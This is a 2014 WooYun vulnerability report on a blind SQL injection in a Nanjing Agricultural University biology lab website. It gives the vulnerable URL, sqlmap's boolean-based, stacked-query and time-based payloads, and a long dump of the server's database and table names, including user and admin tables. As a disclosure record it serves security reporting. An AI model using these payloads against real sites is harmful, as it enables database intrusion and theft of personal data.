当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071690

漏洞标题:南京农业大学生物学实验教学中心盲注

相关厂商:南京农业大学

漏洞作者: 路人甲

提交时间:2014-08-10 00:59

修复时间:2014-09-24 01:00

公开时间:2014-09-24 01:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-10: 细节已通知厂商并且等待厂商处理中
2014-08-12: 厂商已经确认,细节仅向厂商公开
2014-08-22: 细节向核心白帽子及相关领域专家公开
2014-09-01: 细节向普通白帽子公开
2014-09-11: 细节向实习白帽子公开
2014-09-24: 细节向公众公开

简要描述:

这些东西是什么 我读书少 你们不要骗我

详细说明:

http://bio.njau.edu.cn:8003/biocontent.asp?nid=1625&leibie=n91

漏洞证明:

sqlmap identified the following injection points with a total of 44 HTTP(s) requests:
---
Place: GET
Parameter: nid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=1625' AND 9507=9507 AND 'fVQf'='fVQf&leibie=n91
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: nid=1625'; WAITFOR DELAY '0:0:5';-- AND 'sxmY'='sxmY&leibie=n91
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: nid=1625' WAITFOR DELAY '0:0:5'-- AND 'hXSb'='hXSb&leibie=n91
---
Database: Botany
[12 tables]
+--------------------------------------------+
| dbo.CourseSearch                           |
| dbo.Exam                                   |
| dbo.HomeWork                               |
| dbo.Media                                  |
| dbo.PlantInfo                              |
| dbo.Question                               |
| dbo.ReferenceBook                          |
| dbo.ReferenceWeb                           |
| dbo.WordDefine                             |
| dbo.dtproperties                           |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
+--------------------------------------------+
Database: NjEduSoft_MB
[63 tables]
+--------------------------------------------+
| dbo."0用户名"                                    |
| dbo."V_动物体重"                                   |
| dbo."V_动物品系"                                   |
| dbo."V_实验对象"                                   |
| dbo."V_实验导联"                                   |
| dbo."V_实验属性"                                   |
| dbo."V_实验步骤"                                   |
| dbo."V_实验药品"                                   |
| dbo."V_药品药效"                                   |
| dbo."动物体重"                                     |
| dbo."动物品系"                                     |
| dbo."动物年龄"                                     |
| dbo."动物类型"                                     |
| dbo."单步名称"                                     |
| dbo."实验分类"                                     |
| dbo."实验属性"                                     |
| dbo."实验录像"                                     |
| dbo."实验步骤"                                     |
| dbo."实验药品"                                     |
| dbo."毒性实验"                                     |
| dbo."毒性实验仪器"                                     |
| dbo."毒性实验状态"                                     |
| dbo."毒性实验给药途径"                                     |
| dbo."毒性实验预处理"                                     |
| dbo."相互作用"                                     |
| dbo."药品药效"                                     |
| dbo."观察参数"                                     |
| dbo."观察导联"                                     |
| dbo.ChapterInfo                            |
| dbo.DeptInfo                               |
| dbo.ExpMan_GetExpInfo                      |
| dbo.ImportErr                              |
| dbo.JobInfo                                |
| dbo.LoreInfo                               |
| dbo.ManagMenu                              |
| dbo.NewsInfo                               |
| dbo.NewsUser                               |
| dbo.PaperInfo                              |
| dbo.PaperPolicy                            |
| dbo.PaperTest                              |
| dbo.PaperTestType                          |
| dbo.PaperUser                              |
| dbo.RegistInfo                             |
| dbo.RubricInfo                             |
| dbo.SectionInfo                            |
| dbo.SubjectInfo                            |
| dbo.SubjectUser                            |
| dbo.SystemSet                              |
| dbo.T01                                    |
| dbo.T02                                    |
| dbo.T03                                    |
| dbo.T04                                    |
| dbo.T05                                    |
| dbo.T06                                    |
| dbo.T07                                    |
| dbo.TestTypeInfo                           |
| dbo.UserAnswer                             |
| dbo.UserInfo                               |
| dbo.UserPower                              |
| dbo.UserScore                              |
| dbo.dtproperties                           |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
+--------------------------------------------+
Database: attendance
[7 tables]
+--------------------------------------------+
| dbo.dtproperties                           |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.users                                  |
| dbo.users_attendance                       |
| dbo.v_users_attendance                     |
| dbo.work_time                              |
+--------------------------------------------+
Database: center
[19 tables]
+--------------------------------------------+
| center.D99_CMD                             |
| center.D99_Tmp                             |
| center.foofoofoo                           |
| center.kill_kk                             |
| dbo.Category                               |
| dbo.Discuss                                |
| dbo.News                                   |
| dbo.Users                                  |
| dbo.config                                 |
| dbo.count                                  |
| dbo.dtproperties                           |
| dbo.hyinfo                                 |
| dbo.info                                   |
| dbo.moneyinfo                              |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.xiaolu                                 |
| dbo.yiqi                                   |
| dbo.yyd                                    |
+--------------------------------------------+
Database: nbioweb
[12 tables]
+--------------------------------------------+
| dbo.admininfo                              |
| dbo.dtproperties                           |
| dbo.fileinfo                               |
| dbo.ftype                                  |
| dbo.kclist                                 |
| dbo.lablist                                |
| dbo.newsinfo                               |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.teacinfo                               |
| dbo.visitorinfo                            |
| dbo.yzfbbs                                 |
+--------------------------------------------+
Database: cellweb
[16 tables]
+--------------------------------------------+
| dbo.D99_CMD                                |
| dbo.D99_Tmp                                |
| dbo.admininfo                              |
| dbo.bbsinfo                                |
| dbo.chapter                                |
| dbo.classinfo                              |
| dbo.dtproperties                           |
| dbo.fileinfo                               |
| dbo.homeworkinfo                           |
| dbo.netall                                 |
| dbo.noun                                   |
| dbo.question                               |
| dbo.studyinfo                              |
| dbo.syinfo                                 |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
+--------------------------------------------+
Database: njjcweb
[9 tables]
+--------------------------------------------+
| dbo.admininfo                              |
| dbo.dtproperties                           |
| dbo.fileinfo                               |
| dbo.ftype                                  |
| dbo.netall                                 |
| dbo.newsinfo                               |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.yzfbbs                                 |
+--------------------------------------------+
Database: tempdb
[2 tables]
+--------------------------------------------+
| dbo.sysconstraints                         |
| dbo.syssegments                            |
+--------------------------------------------+
Database: msdb
[77 tables]
+--------------------------------------------+
| dbo.RTblClassDefs                          |
| dbo.RTblDBMProps                           |
| dbo.RTblDBXProps                           |
| dbo.RTblDTMProps                           |
| dbo.RTblDTSProps                           |
| dbo.RTblDatabaseVersion                    |
| dbo.RTblEQMProps                           |
| dbo.RTblEnumerationDef                     |
| dbo.RTblEnumerationValueDef                |
| dbo.RTblGENProps                           |
| dbo.RTblIfaceDefs                          |
| dbo.RTblIfaceHier                          |
| dbo.RTblIfaceMem                           |
| dbo.RTblMDSProps                           |
| dbo.RTblNamedObj                           |
| dbo.RTblOLPProps                           |
| dbo.RTblParameterDef                       |
| dbo.RTblPropDefs                           |
| dbo.RTblProps                              |
| dbo.RTblRelColDefs                         |
| dbo.RTblRelshipDefs                        |
| dbo.RTblRelshipProps                       |
| dbo.RTblRelships                           |
| dbo.RTblSIMProps                           |
| dbo.RTblScriptDefs                         |
| dbo.RTblSites                              |
| dbo.RTblSumInfo                            |
| dbo.RTblTFMProps                           |
| dbo.RTblTypeInfo                           |
| dbo.RTblTypeLibs                           |
| dbo.RTblUMLProps                           |
| dbo.RTblUMXProps                           |
| dbo.RTblVersionAdminInfo                   |
| dbo.RTblVersions                           |
| dbo.RTblWorkspaceItems                     |
| dbo.backupfile                             |
| dbo.backupmediafamily                      |
| dbo.backupmediaset                         |
| dbo.backupset                              |
| dbo.log_shipping_primaries                 |
| dbo.log_shipping_secondaries               |
| dbo.logmarkhistory                         |
| dbo.mswebtasks                             |
| dbo.restorefile                            |
| dbo.restorefilegroup                       |
| dbo.restorehistory                         |
| dbo.sqlagent_info                          |
| dbo.sysalerts                              |
| dbo.syscachedcredentials                   |
| dbo.syscategories                          |
| dbo.sysconstraints                         |
| dbo.sysdbmaintplan_databases               |
| dbo.sysdbmaintplan_history                 |
| dbo.sysdbmaintplan_jobs                    |
| dbo.sysdbmaintplans                        |
| dbo.sysdownloadlist                        |
| dbo.sysdtscategories                       |
| dbo.sysdtspackagelog                       |
| dbo.sysdtspackages                         |
| dbo.sysdtssteplog                          |
| dbo.sysdtstasklog                          |
| dbo.sysjobhistory                          |
| dbo.sysjobs                                |
| dbo.sysjobs_view                           |
| dbo.sysjobschedules                        |
| dbo.sysjobservers                          |
| dbo.sysjobsteps                            |
| dbo.sysnotifications                       |
| dbo.sysoperators                           |
| dbo.syssegments                            |
| dbo.systargetservergroupmembers            |
| dbo.systargetservergroups                  |
| dbo.systargetservers                       |
| dbo.systargetservers_view                  |
| dbo.systaskids                             |
| dbo.systasks                               |
| dbo.systasks_view                          |
+--------------------------------------------+
Database: biologyweb
[42 tables]
+--------------------------------------------+
| dbo.admininfo                              |
| dbo.departmentinfo                         |
| dbo.dtproperties                           |
| dbo.fileinfo                               |
| dbo.ftype                                  |
| dbo.hcintoinfo                             |
| dbo.hcnowinfo                              |
| dbo.hcorderinfo                            |
| dbo.hcoutinfo                              |
| dbo.jfinfo                                 |
| dbo.jroominfo                              |
| dbo.kcsubjectinfo                          |
| dbo.kechenginfo                            |
| dbo.kfsubjectinfo                          |
| dbo.kinfo                                  |
| dbo.kxtype                                 |
| dbo.netall                                 |
| dbo.newsinfo                               |
| dbo.questioninfo                           |
| dbo.roominfo                               |
| dbo.schoolinfo                             |
| dbo.sjintoinfo                             |
| dbo.sjnowinfo                              |
| dbo.sjorderinfo                            |
| dbo.sjorderinfo1                           |
| dbo.sjoutinfo                              |
| dbo.stuinfo                                |
| dbo.stumailinfo                            |
| dbo.subjectinfo                            |
| dbo.sy                                     |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.teacherinfo                            |
| dbo.teacmailinfo                           |
| dbo.visitorinfo                            |
| dbo.workinfo                               |
| dbo.workinfo1                              |
| dbo.yqinfo                                 |
| dbo.yzfbbs                                 |
| dbo.zxtype                                 |
| dbo.zyinfo                                 |
| dbo.zztype                                 |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| dbo.authors                                |
| dbo.discounts                              |
| dbo.employee                               |
| dbo.jobs                                   |
| dbo.pub_info                               |
| dbo.publishers                             |
| dbo.roysched                               |
| dbo.sales                                  |
| dbo.stores                                 |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.titleauthor                            |
| dbo.titles                                 |
| dbo.titleview                              |
+--------------------------------------------+
Database: foodweb
[21 tables]
+--------------------------------------------+
| dbo.D99_CMD                                |
| dbo.D99_REG                                |
| dbo.D99_Tmp                                |
| dbo.aboutinfo                              |
| dbo.count                                  |
| dbo.dtproperties                           |
| dbo.fileinfo                               |
| dbo.ftype                                  |
| dbo.jlgsinfo                               |
| dbo.kxyjinfo                               |
| dbo.linkinfo                               |
| dbo.newsinfo                               |
| dbo.pangolin_test_table                    |
| dbo.rencaiinfo                             |
| dbo.stuinfo                                |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.t_jiaozhu                              |
| dbo.teacinfo                               |
| dbo.xuekeinfo                              |
| dbo.xyinfo                                 |
+--------------------------------------------+
Database: yzfweb
[10 tables]
+--------------------------------------------+
| dbo.admininfo                              |
| dbo.dtproperties                           |
| dbo.fileinfo                               |
| dbo.ftype                                  |
| dbo.index_swf                              |
| dbo.netall                                 |
| dbo.newsinfo                               |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.yzfbbs                                 |
+--------------------------------------------+
Database: master
[38 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS       |
| INFORMATION_SCHEMA.COLUMNS                 |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  |
| INFORMATION_SCHEMA.DOMAINS                 |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS      |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        |
| INFORMATION_SCHEMA.PARAMETERS              |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES                |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         |
| INFORMATION_SCHEMA.SCHEMATA                |
| INFORMATION_SCHEMA.TABLES                  |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        |
| INFORMATION_SCHEMA.VIEWS                   |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        |
| dbo.JNC                                    |
| dbo.MSreplication_options                  |
| dbo.dtproperties                           |
| dbo.spt_datatype_info                      |
| dbo.spt_datatype_info_ext                  |
| dbo.spt_fallback_db                        |
| dbo.spt_fallback_dev                       |
| dbo.spt_fallback_usg                       |
| dbo.spt_monitor                            |
| dbo.spt_provider_types                     |
| dbo.spt_server_info                        |
| dbo.spt_values                             |
| dbo.sysconstraints                         |
| dbo.syslogins                              |
| dbo.sysoledbusers                          |
| dbo.sysopentapes                           |
| dbo.sysremotelogins                        |
| dbo.syssegments                            |
+--------------------------------------------+
Database: muchroom
[15 tables]
+--------------------------------------------+
| dbo.AdminLog                               |
| dbo.CourseIntro                            |
| dbo.CourseUpdate                           |
| dbo.MaMenu                                 |
| dbo.MuchroomCharacter                      |
| dbo.MuchroomCompany                        |
| dbo.MuchroomDregs                          |
| dbo.MuchroomPackage                        |
| dbo.MuchroomProduction                     |
| dbo.MuchroomTechnology                     |
| dbo.MyUser                                 |
| dbo.Pro                                    |
| dbo.dtproperties                           |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
+--------------------------------------------+
Database: db_foodweb
[28 tables]
+--------------------------------------------+
| dbo.D99_CMD                                |
| dbo.D99_REG                                |
| dbo.D99_Tmp                                |
| dbo.PicInfo                                |
| dbo.aboutinfo                              |
| dbo.adminqx                                |
| dbo.count                                  |
| dbo.dtproperties                           |
| dbo.fileinfo                               |
| dbo.ftype                                  |
| dbo.jlgsinfo                               |
| dbo.kxyjinfo                               |
| dbo.linkinfo                               |
| dbo.newsType                               |
| dbo.newsinfo                               |
| dbo.rencaiType                             |
| dbo.rencaiinfo                             |
| dbo.stuinfo                                |
| dbo.syscommand                             |
| dbo.sysconstraints                         |
| dbo.sysfile1                               |
| dbo.syssegments                            |
| dbo.systree                                |
| dbo.t_jiaozhu                              |
| dbo.teacType                               |
| dbo.teacinfo                               |
| dbo.xuekeinfo                              |
| dbo.xyinfo                                 |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| dbo.sysconstraints                         |
| dbo.syssegments                            |
+--------------------------------------------+
Database: vir3d
[7 tables]
+--------------------------------------------+
| dbo.admininfo                              |
| dbo.dtproperties                           |
| dbo.fileinfo                               |
| dbo.ftype                                  |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.virinfo                                |
+--------------------------------------------+
Database: lfclab
[17 tables]
+--------------------------------------------+
| dbo.comment                                |
| dbo.dtproperties                           |
| dbo.hcintoinfo                             |
| dbo.hcnowinfo                              |
| dbo.hcoutinfo                              |
| dbo.hcydinfo                               |
| dbo.jfidinfo                               |
| dbo.labinfo                                |
| dbo.labroom                                |
| dbo.pfinfo                                 |
| dbo.sjintoinfo                             |
| dbo.sjnowinfo                              |
| dbo.sjoutinfo                              |
| dbo.sjydinfo                               |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.userinfo                               |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| dbo."Alphabetical list of products"        |
| dbo."Category Sales for 1997"              |
| dbo."Current Product List"                 |
| dbo."Customer and Suppliers by City"       |
| dbo."Order Details Extended"               |
| dbo."Order Details"                        |
| dbo."Order Subtotals"                      |
| dbo."Orders Qry"                           |
| dbo."Product Sales for 1997"               |
| dbo."Products Above Average Price"         |
| dbo."Products by Category"                 |
| dbo."Quarterly Orders"                     |
| dbo."Sales Totals by Amount"               |
| dbo."Sales by Category"                    |
| dbo."Summary of Sales by Quarter"          |
| dbo."Summary of Sales by Year"             |
| dbo.Categories                             |
| dbo.CustomerCustomerDemo                   |
| dbo.CustomerDemographics                   |
| dbo.Customers                              |
| dbo.EmployeeTerritories                    |
| dbo.Employees                              |
| dbo.Invoices                               |
| dbo.Orders                                 |
| dbo.Products                               |
| dbo.Region                                 |
| dbo.Shippers                               |
| dbo.Suppliers                              |
| dbo.Territories                            |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
+--------------------------------------------+
Database: spzx
[12 tables]
+--------------------------------------------+
| dbo.admininfo                              |
| dbo.bmulu                                  |
| dbo.dtproperties                           |
| dbo.fileinfo                               |
| dbo.ftype                                  |
| dbo.mulu                                   |
| dbo.netall                                 |
| dbo.newsinfo                               |
| dbo.sysconstraints                         |
| dbo.syssegments                            |
| dbo.yyinfo                                 |
| dbo.yzfbbs                                 |
+--------------------------------------------+

修复方案:

你懂的!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-08-12 09:17

厂商回复:

通知用户处理中

最新状态:

暂无